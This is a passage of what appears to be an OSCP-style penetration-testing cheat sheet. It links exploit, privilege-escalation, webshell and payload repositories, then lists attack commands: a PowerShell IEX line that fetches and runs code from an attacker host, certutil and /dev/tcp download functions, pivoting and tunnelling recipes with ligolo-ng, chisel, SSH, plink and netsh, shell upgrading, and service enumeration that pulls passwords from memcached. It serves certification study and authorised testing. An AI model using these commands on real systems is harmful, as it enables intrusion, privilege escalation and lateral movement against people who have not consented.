| Use-After-Free Linux Kernel Netfilter nf_tables LPE | https://github.com/Notselwyn/CVE-2024-1086 |\n| CVE-2024-4577 | PHP-CGI Argument Injection Vulnerability RCE | https://github.com/watchtowrlabs/CVE-2024-4577 |\n| CVE-2024-30088 | Microsoft Windows LPE | https://github.com/tykawaii98/CVE-2024-30088 |\n| n/a | dompdf RCE (0-day) | https://github.com/positive-security/dompdf-rce |\n| n/a | dompdf XSS to RCE (0-day) | https://positive.security/blog/dompdf-rce |\n| n/a | StorSvc LPE | https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc |\n| n/a | ADCSCoercePotato | https://github.com/decoder-it/ADCSCoercePotato |\n| n/a | CoercedPotato LPE | https://github.com/Prepouce/CoercedPotato |\n| n/a | DCOMPotato LPE | https://github.com/zcgonvh/DCOMPotato |\n| n/a | DeadPotato LPE | https://github.com/lypd0/DeadPotato |\n| n/a | GenericPotato LPE | https://github.com/micahvandeusen/GenericPotato |\n| n/a | GodPotato LPE | https://github.com/BeichenDream/GodPotato |\n| n/a | JuicyPotato LPE | https://github.com/ohpe/juicy-potato |\n| n/a | Juice-PotatoNG LPE | https://github.com/antonioCoco/JuicyPotatoNG |\n| n/a | MultiPotato LPE | https://github.com/S3cur3Th1sSh1t/MultiPotato |\n| n/a | RemotePotato0 PE | https://github.com/antonioCoco/RemotePotato0 |\n| n/a | RoguePotato LPE | https://github.com/antonioCoco/RoguePotato |\n| n/a | RottenPotatoNG LPE | https://github.com/breenmachine/RottenPotatoNG |\n| n/a | SharpEfsPotato LPE | https://github.com/bugch3ck/SharpEfsPotato |\n| n/a | SigmaPotato LPE | https://github.com/tylerdotrar/SigmaPotato |\n| n/a | SweetPotato LPE | https://github.com/CCob/SweetPotato |\n| n/a | SweetPotato LPE | https://github.com/uknowsec/SweetPotato |\n| n/a | S4UTomato LPE | https://github.com/wh0amitz/S4UTomato |\n| n/a | PrintSpoofer LPE (1) | https://github.com/dievus/printspoofer |\n| n/a | PrintSpoofer LPE (2) | https://github.com/itm4n/PrintSpoofer |\n| n/a | Shocker Container Escape | https://github.com/gabrtv/shocker |\n| n/a | SystemNightmare PE | https://github.com/GossiTheDog/SystemNightmare |\n| n/a | NoFilter LPE | https://github.com/deepinstinct/NoFilter |\n| n/a | OfflineSAM LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM |\n| n/a | OfflineAddAdmin2 LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2 |\n| n/a | Kernelhub | https://github.com/Ascotbe/Kernelhub |\n| n/a | Windows Exploits | https://github.com/SecWiki/windows-kernel-exploits |\n| n/a | Pre-compiled Windows Exploits | https://github.com/abatchy17/WindowsExploits |\n\n### Payloads\n\n| Name | URL |\n| --- | --- |\n| Payload Box | https://github.com/payloadbox |\n| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |\n| phpgcc | https://github.com/ambionics/phpggc |\n| PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell|\n| webshell | https://github.com/tennc/webshell |\n| Web-Shells | https://github.com/TheBinitGhimire/Web-Shells |\n\n### Wordlists\n\n| Name | URL |\n| --- | --- |\n| bopscrk | https://github.com/R3nt0n/bopscrk |\n| CeWL | https://github.com/digininja/cewl |\n| COOK | https://github.com/giteshnxtlvl/cook |\n| CUPP | https://github.com/Mebus/cupp |\n| Kerberos Username Enumeration | https://github.com/attackdebris/kerberos_enum_userlists |\n| SecLists | https://github.com/danielmiessler/SecLists |\n| Username Anarchy | https://github.com/urbanadventurer/username-anarchy |\n\n### Reporting\n\n| Name | URL |\n| --- | --- |\n| OSCP-Note-Vault | https://github.com/0xsyr0/OSCP-Note-Vault |\n| SysReptor | https://github.com/Syslifters/sysreptor |\n| SysReptor OffSec Reporting | https://github.com/Syslifters/OffSec-Reporting |\n| SysReptor Portal | https://oscp.sysreptor.com/oscp/signup/ |\n\n### Social Media Resources\n\n| Name | URL |\n| --- | --- |\n| OSCP Guide 01/12 – My Exam Experience | https://www.youtube.com/watch?v=9mrf-WyzkpE\u0026list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x |\n| Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ |\n| HackTricks | https://book.hacktricks.xyz/ |\n| HackTricks Local Windows Privilege Escalation Checklist | https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation |\n| Hacking Articles | https://www.hackingarticles.in/ |\n| Rednode Windows Privilege Escalation | https://rednode.com/privilege-escalation/windows-privilege-escalation-cheat-sheet/ |\n| OSCP Cheat Sheet by xsudoxx | https://github.com/xsudoxx/OSCP |\n| OSCP-Tricks-2023 by Rodolfo Marianocy | https://github.com/rodolfomarianocy/OSCP-Tricks-2023 |\n| IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA |\n| IppSec.rocks | https://ippsec.rocks/?# |\n| 0xdf | https://0xdf.gitlab.io/ |\n\n## Commands\n\n### Basics\n\n#### curl\n\n```c\ncurl -v http://\u003cDOMAIN\u003e // verbose output\ncurl -X POST http://\u003cDOMAIN\u003e // use POST method\ncurl -X PUT http://\u003cDOMAIN\u003e // use PUT method\ncurl --path-as-is http://\u003cDOMAIN\u003e/../../../../../../etc/passwd // use --path-as-is to handle /../ or /./ in the given URL\ncurl --proxy http://127.0.0.1:8080 // use proxy\ncurl -F myFile=@\u003cFILE\u003e http://\u003cRHOST\u003e // file upload\ncurl${IFS}\u003cLHOST\u003e/\u003cFILE\u003e // Internal Field Separator (IFS) example\n```\n\n#### File Transfer\n\n##### Certutil\n\n```c\ncertutil -urlcache -split -f \"http://\u003cLHOST\u003e/\u003cFILE\u003e\" \u003cFILE\u003e\n```\n\n##### Netcat\n\n```c\nnc -lnvp \u003cLPORT\u003e \u003c \u003cFILE\u003e\nnc \u003cRHOST\u003e \u003cRPORT\u003e \u003e \u003cFILE\u003e\n```\n\n##### Impacket\n\n```c\nsudo impacket-smbserver \u003cSHARE\u003e ./\nsudo impacket-smbserver \u003cSHARE\u003e . -smb2support\ncopy * \\\\\u003cLHOST\u003e\\\u003cSHARE\u003e\n```\n\n##### PowerShell\n\n```c\niwr \u003cLHOST\u003e/\u003cFILE\u003e -o \u003cFILE\u003e\nIEX(IWR http://\u003cLHOST\u003e/\u003cFILE\u003e) -UseBasicParsing\npowershell -command Invoke-WebRequest -Uri http://\u003cLHOST\u003e:\u003cLPORT\u003e/\u003cFILE\u003e -Outfile C:\\\\temp\\\\\u003cFILE\u003e\n```\n\n##### Bash only\n\n###### wget version\n\nPaste directly to the shell.\n\n```c\nfunction __wget() {\n : ${DEBUG:=0}\n local URL=$1\n local tag=\"Connection: close\"\n local mark=0\n\n if [ -z \"${URL}\" ]; then\n printf \"Usage: %s \\\"URL\\\" [e.g.: %s http://www.google.com/]\" \\\n \"${FUNCNAME[0]}\" \"${FUNCNAME[0]}\"\n return 1;\n fi\n read proto server path \u003c\u003c\u003c$(echo ${URL//// })\n DOC=/${path// //}\n HOST=${server//:*}\n PORT=${server//*:}\n [[ x\"${HOST}\" == x\"${PORT}\" ]] \u0026\u0026 PORT=80\n [[ $DEBUG -eq 1 ]] \u0026\u0026 echo \"HOST=$HOST\"\n [[ $DEBUG -eq 1 ]] \u0026\u0026 echo \"PORT=$PORT\"\n [[ $DEBUG -eq 1 ]] \u0026\u0026 echo \"DOC =$DOC\"\n\n exec 3\u003c\u003e/dev/tcp/${HOST}/$PORT\n echo -en \"GET ${DOC} HTTP/1.1\\r\\nHost: ${HOST}\\r\\n${tag}\\r\\n\\r\\n\" \u003e\u00263\n while read line; do\n [[ $mark -eq 1 ]] \u0026\u0026 echo $line\n if [[ \"${line}\" =~ \"${tag}\" ]]; then\n mark=1\n fi\n done \u003c\u00263\n exec 3\u003e\u0026-\n}\n```\n\n```c\n__wget http://\u003cLHOST\u003e/\u003cFILE\u003e\n```\n\n###### curl version\n\n```c\nfunction __curl() {\n read proto server path \u003c\u003c\u003c$(echo ${1//// })\n DOC=/${path// //}\n HOST=${server//:*}\n PORT=${server//*:}\n [[ x\"${HOST}\" == x\"${PORT}\" ]] \u0026\u0026 PORT=80\n\n exec 3\u003c\u003e/dev/tcp/${HOST}/$PORT\n echo -en \"GET ${DOC} HTTP/1.0\\r\\nHost: ${HOST}\\r\\n\\r\\n\" \u003e\u00263\n (while read line; do\n [[ \"$line\" == $'\\r' ]] \u0026\u0026 break\n done \u0026\u0026 cat) \u003c\u00263\n exec 3\u003e\u0026-\n}\n```\n\n```c\n__curl http://\u003cLHOST\u003e/\u003cFILE\u003e \u003e \u003cOUTPUT_FILE\u003e\n```\n\n#### FTP\n\n```c\nftp \u003cRHOST\u003e\nftp -A \u003cRHOST\u003e\nwget -r ftp://anonymous:anonymous@\u003cRHOST\u003e\n```\n\n#### Kerberos\n\n```c\nsudo apt-get install krb5-kdc\n```\n\n##### Ticket Handling\n\n```c\nimpacket-getTGT \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:'\u003cPASSWORD\u003e'\nexport KRB5CCNAME=\u003cFILE\u003e.ccache\nexport KRB5CCNAME='realpath \u003cFILE\u003e.ccache'\n```\n\n##### Kerberos related Files\n\n```c\n/etc/krb5.conf // kerberos configuration file location\nkinit \u003cUSERNAME\u003e // creating ticket request\nklist // show available kerberos tickets\nkdestroy // delete cached kerberos tickets\n.k5login // resides kerberos principals for login (place in home directory)\nkrb5.keytab // \"key table\" file for one or more principals\nkadmin // kerberos administration console\nadd_principal \u003cEMAIL\u003e // add a new user to a keytab file\nksu // executes a command with kerberos authentication\nklist -k /etc/krb5.keytab // lists keytab file\nkadmin -p kadmin/\u003cEMAIL\u003e -k -t /etc/krb5.keytab // enables editing of the keytab file\n```\n\n##### Ticket Conversion\n\n###### kribi to ccache\n\n```c\nbase64 -d \u003cUSERNAME\u003e.kirbi.b64 \u003e \u003cUSERNAME\u003e.kirbi\nimpacket-ticketConverter \u003cUSERNAME\u003e.kirbi \u003cUSERNAME\u003e.ccache\nexport KRB5CCNAME=`realpath \u003cUSERNAME\u003e.ccache`\n```\n\n###### ccache to kirbi\n\n```c\nimpacket-ticketConverter \u003cUSERNAME\u003e.ccache \u003cUSERNAME\u003e.kirbi\nbase64 -w0 \u003cUSERNAME\u003e.kirbi \u003e \u003cUSERNAME\u003e.kirbi.base64\n```\n\n#### Ligolo-ng\n\n\u003e https://github.com/nicocha30/ligolo-ng\n\n##### Download Proxy and Agent\n\n```c\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz\n```\n\n##### Prepare Tunnel Interface\n\n```c\nsudo ip tuntap add user $(whoami) mode tun ligolo\n```\n\n```c\nsudo ip link set ligolo up\n```\n\n##### Setup Proxy on Attacker Machine\n\n```c\n./proxy -laddr \u003cLHOST\u003e:443 -selfcert\n```\n\n##### Setup Agent on Target Machine\n\n```c\n./agent -connect \u003cLHOST\u003e:443 -ignore-cert\n```\n\n##### Configure Session\n\n```c\nligolo-ng » session\n```\n\n```c\n[Agent : user@target] » ifconfig\n```\n\n```c\nsudo ip r add 172.16.1.0/24 dev ligolo\n```\n\n```c\n[Agent : user@target] » start\n```\n\n###### Port Forwarding\n\n```c\n[Agent : user@target] » listener_add --addr \u003cRHOST\u003e:\u003cLPORT\u003e --to \u003cLHOST\u003e:\u003cLPORT\u003e --tcp\n```\n\n#### Linux\n\n##### CentOS\n\n```c\ndoas -u \u003cUSERNAME\u003e /bin/sh\n```\n\n##### Environment Variables\n\n```c\nexport PATH=`pwd`:$PATH\n```\n\n##### gcc\n\n```c\ngcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit\ni686-w64-mingw32-gcc -o main32.exe main.c\nx86_64-w64-mingw32-gcc -o main64.exe main.c\n```\n\n##### getfacl\n\n```c\ngetfacl \u003cLOCAL_DIRECTORY\u003e\n```\n\n##### iconv\n\n```c\necho \"\u003cCOMMAND\u003e\" | iconv -t UTF-16LE | base64 -w 0\necho \"\u003cCOMMAND\u003e\" | iconv -f UTF-8 -t UTF-16LE | base64 -w0\niconv -f ASCII -t UTF-16LE \u003cFILE\u003e.txt | base64 | tr -d \"\\n\"\n```\n\n##### vi\n\n```c\n:w !sudo tee % # save file with elevated privileges without exiting\n```\n\n##### Windows Command Formatting\n\n```c\necho \"\u003cCOMMAND\u003e\" | iconv -f UTF-8 -t UTF-16LE | base64 -w0\n```\n\n#### Microsoft Windows\n\n##### dir\n\n```c\ndir /a\ndir /a:d\ndir /a:h\ndir flag* /s /p\ndir /s /b *.log\n```\n\n#### PHP Webserver\n\n```c\nsudo php -S 127.0.0.1:80\n```\n\n#### Ping\n\n```c\nping -c 1 \u003cRHOST\u003e\nping -n 1 \u003cRHOST\u003e\n```\n\n#### Port Forwarding\n\n##### Chisel\n\n| System | IP address |\n| ------------------ | -------------- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n###### Reverse Pivot\n\n- LHOST \u003c APPLICATION SERVER\n\n###### LHOST\n\n```c\n./chisel server -p 9002 -reverse -v\n```\n\n###### APPLICATION SERVER\n\n```c\n./chisel client 192.168.50.10:9002 R:3000:127.0.0.1:3000\n```\n\n###### SOCKS5 / Proxychains Configuration\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### LHOST\n\n```c\n./chisel server -p 9002 -reverse -v\n```\n\n###### APPLICATION SERVER\n\n```c\n./chisel client 192.168.50.10:9002 R:socks\n```\n\n##### Ligolo-ng\n\n\u003e https://github.com/nicocha30/ligolo-ng\n\n| System | IP address |\n| ------------------ | -------------- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### Download Proxy and Agent\n\n\u003e https://github.com/nicocha30/ligolo-ng/releases\n\n```c\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_Linux_64bit.tar.gz\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_Linux_64bit.tar.gz\n```\n\n###### Prepare Tunnel Interface\n\n```c\nsudo ip tuntap add user $(whoami) mode tun ligolo\n```\n\n```c\nsudo ip link set ligolo up\n```\n\n###### Setup Proxy on LHOST\n\n```c\n./proxy -laddr 192.168.50.10:443 -selfcert\n```\n\n###### Setup Agent on APPLICATION SERVER\n\n```c\n./agent -connect 192.168.50.10:443 -ignore-cert\n```\n\n###### Configure Session\n\n```c\nligolo-ng » session\n```\n\n```c\n[Agent : user@target] » ifconfig\n```\n\n```c\nsudo ip r add 172.16.50.0/24 dev ligolo\n```\n\n```c\n[Agent : user@target] » start\n```\n\n###### Port Forwarding\n\n- LHOST \u003c APPLICATION SERVER \u003e DATABASE SERVER\n\n```c\n[Agent : user@target] » listener_add --addr 10.10.100.20:2345 --to 192.168.50.10:2345 --tcp\n```\n\n##### Socat\n\n| System | IP address |\n| ------------------ | -------------- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER \u003e DATABASE SERVER\n\n###### APPLICATION SERVER\n\n```c\nip a\nip r\nsocat -ddd TCP-LISTEN:2345,fork TCP:\u003cRHOST\u003e:5432\n```\n\n###### LHOST\n\n```c\npsql -h \u003cRHOST\u003e -p 2342 -U postgres\n```\n\n##### SSH Tunneling\n\n###### Local Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER \u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nssh \u003cUSERNAME\u003e@192.168.100.10\nip a\nip r\nfor i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445;\nssh -N -L 0.0.0.0:4455:172.16.50.10:445 \u003cUSERNAME\u003e@10.10.100.20\n```\n\n###### LHOST\n\n```c\nsmbclient -p 4455 //172.16.50.10/\u003cSHARE\u003e -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e\n```\n\n###### Dynamic Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER \u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nssh -N -D 0.0.0.0:9999 \u003cUSERNAME\u003e@10.10.100.20\n```\n\n###### LHOST\n\n```c\nsudo ss -tulpn\ntail /etc/proxychains4.conf\nsocks5 192.168.50.10 9999\nproxychains smbclient -p 4455 //172.16.50.10/\u003cSHARE\u003e -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e\n```\n\n###### Remote Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003c-\u003e FIREWALL \u003c-\u003e APPLICATION SERVER \u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### LHOST\n\n```c\nsudo systemctl start ssh\nsudo ss -tulpn\n```\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nssh -N -R 127.0.0.1:2345:10.10.100.20:5432 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\npsql -h 127.0.0.1 -p 2345 -U postgres\n```\n\n###### Remote Dynamic Port Forwarding\n\n| System | IP address |\n| ------------------ | -------------- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003c FIREWALL \u003c APPLICATION SERVER \u003e NETWORK\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nssh -N -R 9998 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\nsudo ss -tulpn\ntail /etc/proxychains4.conf\nsocks5 127.0.0.1 9998\nproxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20\n```\n\n##### sshuttle\n\n| System | IP address |\n| ------------------ | -------------- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### APPLICATION SERVER\n\n```c\nsocat TCP-LISTEN:2222,fork TCP:10.10.100.20:22\n```\n\n###### LHOST\n\n```c\nsshuttle -r \u003cUSERNAME\u003e@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24\nsmbclient -L //172.16.50.10/ -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e\n```\n\n##### ssh.exe\n\n| System | IP address |\n| ------------------- | -------------- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER \u003e NETWORK\n\n###### LHOST\n\n```c\nsudo systemctl start ssh\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:192.168.100.20\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nwhere ssh\nC:\\Windows\\System32\\OpenSSH\\ssh.exe\nC:\\Windows\\System32\\OpenSSH\u003e ssh -N -R 9998 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\nss -tulpn\ntail /etc/proxychains4.conf\nsocks5 127.0.0.1 9998\nproxychains psql -h 10.10.100.20 -U postgres\n```\n\n##### Plink\n\n| System | IP address |\n| ------------------- | -------------- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER\n\n###### LHOST\n\n```c\nfind / -name plink.exe 2\u003e/dev/null\n/usr/share/windows-resources/binaries/plink.exe\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nplink.exe -ssh -l \u003cUSERNAME\u003e -pw \u003cPASSWORD\u003e -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10\n```\n\n###### LHOST\n\n```c\nss -tulpn\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:127.0.0.1:9833\n```\n\n##### Netsh\n\n| System | IP address |\n| ------------------- | -------------- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER \u003e DATABASE SERVER\n\n###### LHOST\n\n```c\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:192.168.100.20\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nnetsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20\nnetstat -anp TCP | findstr \"2222\"\nnetsh interface portproxy show all\nnetsh advfirewall firewall add rule name=\"port_forward_ssh_2222\" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow\n```\n\n###### LHOST\n\n```c\nsudo nmap -sS 192.168.50.10 -Pn -n -p2222\nssh database_admin@192.168.50.10 -p2222\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nnetsh advfirewall firewall delete rule name=\"port_forward_ssh_2222\"\nnetsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10\n```\n\n#### Python Webserver\n\n```c\nsudo python -m SimpleHTTPServer 80\nsudo python3 -m http.server 80\n```\n\n#### RDP\n\n```c\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /cert-ignore\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /d:\u003cDOMAIN\u003e /cert-ignore\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /dynamic-resolution +clipboard\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /d:\u003cDOMAIN\u003e /pth:'\u003cHASH\u003e' /dynamic-resolution +clipboard\nxfreerdp /v:\u003cRHOST\u003e /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla\nrdesktop \u003cRHOST\u003e\n```\n\n#### showmount\n\n```c\n/usr/sbin/showmount -e \u003cRHOST\u003e\nsudo showmount -e \u003cRHOST\u003e\nchown root:root sid-shell; chmod +s sid-shell\n```\n\n#### SMB\n\n```c\nmount.cifs //\u003cRHOST\u003e/\u003cSHARE\u003e /mnt/remote\nguestmount --add '/\u003cMOUNTPOINT\u003e/\u003cDIRECTORY/FILE\u003e' --inspector --ro /mnt/\u003cMOUNT\u003e -v\n```\n\n#### smbclient\n\n```c\nsmbclient -L \\\\\u003cRHOST\u003e\\ -N\nsmbclient -L //\u003cRHOST\u003e/ -N\nsmbclient -L ////\u003cRHOST\u003e/ -N\nsmbclient -L //\u003cRHOST\u003e// -U \u003cUSERNAME\u003e%\u003cPASSWORD\u003e\nsmbclient -U \"\u003cUSERNAME\u003e\" -L \\\\\\\\\u003cRHOST\u003e\\\\\nsmbclient //\u003cRHOST\u003e/\u003cSHARE\u003e\nsmbclient //\u003cRHOST\u003e/\u003cSHARE\u003e -U \u003cUSERNAME\u003e\nsmbclient //\u003cRHOST\u003e/SYSVOL -U \u003cUSERNAME\u003e%\u003cPASSWORD\u003e\nsmbclient \"\\\\\\\\\u003cRHOST\u003e\\\u003cSHARE\u003e\"\nsmbclient \\\\\\\\\u003cRHOST\u003e\\\\\u003cSHARE\u003e -U '\u003cUSERNAME\u003e' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000\nsmbclient --no-pass //\u003cRHOST\u003e/\u003cSHARE\u003e\n```\n\n##### Download multiple files at once\n\n```c\nmask\"\"\nrecurse ON\nprompt OFF\nmget *\n```\n\n#### SSH\n\n```c\nssh user@\u003cRHOST\u003e -oKexAlgorithms=+diffie-hellman-group1-sha1\n```\n\n#### Time and Date\n\n##### Get the Server Time\n\n```c\nsudo nmap -sU -p 123 --script ntp-info \u003cRHOST\u003e\n```\n\n##### Stop virtualbox-guest-utils to stop syncing Time\n\n```c\nsudo /etc/init.d/virtualbox-guest-utils stop\n```\n\n##### Stop systemd-timesyncd to sync Time manually\n\n```c\nsudo systemctl stop systemd-timesyncd\n```\n\n##### Disable automatic Sync\n\n```c\nsudo systemctl disable --now chronyd\n```\n\n##### Options to set the Date and Time\n\n```c\nsudo net time -c \u003cRHOST\u003e\nsudo net time set -S \u003cRHOST\u003e\nsudo net time \\\\\u003cRHOST\u003e /set /y\nsudo ntpdate \u003cRHOST\u003e\nsudo ntpdate -s \u003cRHOST\u003e\nsudo ntpdate -b -u \u003cRHOST\u003e\nsudo timedatectl set-timezone UTC\nsudo timedatectl list-timezones\nsudo timedatectl set-timezone '\u003cCOUNTRY\u003e/\u003cCITY\u003e'\nsudo timedatectl set-time 15:58:30\nsudo timedatectl set-time '2015-11-20 16:14:50'\nsudo timedatectl set-local-rtc 1\n```\n\n##### Keep in Sync with a Server\n\n```c\nwhile [ 1 ]; do sudo ntpdate \u003cRHOST\u003e;done\n```\n\n#### Tmux\n\n```c\nctrl b + w # show windows\nctrl + \" # split window horizontal\nctrl + % # split window vertical\nctrl + , # rename window\nctrl + { # flip window\nctrl + } # flip window\nctrl + spacebar # switch pane layout\n```\n\nCopy \u0026 Paste\n```c\n:setw -g mode-keys vi\nctrl b + [\nspace\nenter\nctrl b + ]\n```\n\nSearch\n```c\nctrl b + [ # enter copy\nctrl + / # enter search while within copy mode for vi mode\nn # search next\nshift + n # reverse search\n```\n\nLogging\n```c\nctrl b\nshift + P # start / stop\n```\n\nSave Output\n```c\nctrl b + :\ncapture-pane -S -\nctrl b + :\nsave-buffer \u003cFILE\u003e.txt\n```\n\n#### Upgrading Shells\n\n```c\npython -c 'import pty;pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\n\nctrl + z\nstty raw -echo\nfg\nEnter\nEnter\nexport XTERM=xterm\n```\n\nor\n\n```c\nCtrl + z\nstty -a\nstty raw -echo;fg\nEnter\nEnter\nstty rows 37 cols 123\nexport TERM=xterm-256color\nbash\n```\n\nAlternatively:\n\n```c\nscript -q /dev/null -c bash\n/usr/bin/script -qc /bin/bash /dev/null\n```\n\n### Oneliner\n\n```c\nstty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;\n```\n\n#### Fixing Staircase Effect\n\n```c\nenv reset\n```\n\nor\n\n```c\nstty onlcr\n```\n\n#### VirtualBox\n\n```c\nsudo pkill VBoxClient \u0026\u0026 VBoxClient --clipboard\n```\n\n#### virtualenv\n\n```c\nsudo apt-get install virtualenv\nvirtualenv -p python2.7 venv\n. venv/bin/activate\n```\n\n```c\npython.exe -m pip install virtualenv\npython.exe -m virtualenv venv\nvenv\\Scripts\\activate\n```\n\n### Information Gathering\n\n#### memcached\n\n\u003e https://github.com/pd4d10/memcached-cli\n\n```c\nmemcrashed / 11211/UDP\n\nnpm install -g memcached-cli\nmemcached-cli \u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e:11211\necho -en \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00stats\\r\\n\" | nc -q1 -u 127.0.0.1 11211\n\nSTAT pid 21357\nSTAT uptime 41557034\nSTAT time 1519734962\n\nsudo nmap \u003cRHOST\u003e -p 11211 -sU -sS --script memcached-info\n\nstats items\nstats cachedump 1 0\nget link\nget file\nget user\nget passwd\nget account\nget username\nget password\n```\n\n#### NetBIOS\n\n```c\nnbtscan \u003cRHOST\u003e\nnmblookup -A \u003cRHOST\u003e\n```\n\n#### Nmap\n\n```c\nsudo nmap -A -T4 -sC -sV -p- \u003cRHOST\u003e\nsudo nmap -sV -sU \u003cRHOST\u003e\nsudo nmap -A -T4 -sC -sV --script vuln \u003cRHOST\u003e\nsudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery \u003cRHOST\u003e\nsudo nmap -sC -sV -p- --scan-delay 5s \u003cRHOST\u003e\nsudo nmap $TARGET -p 88 --script krb5-enum-users --script-args 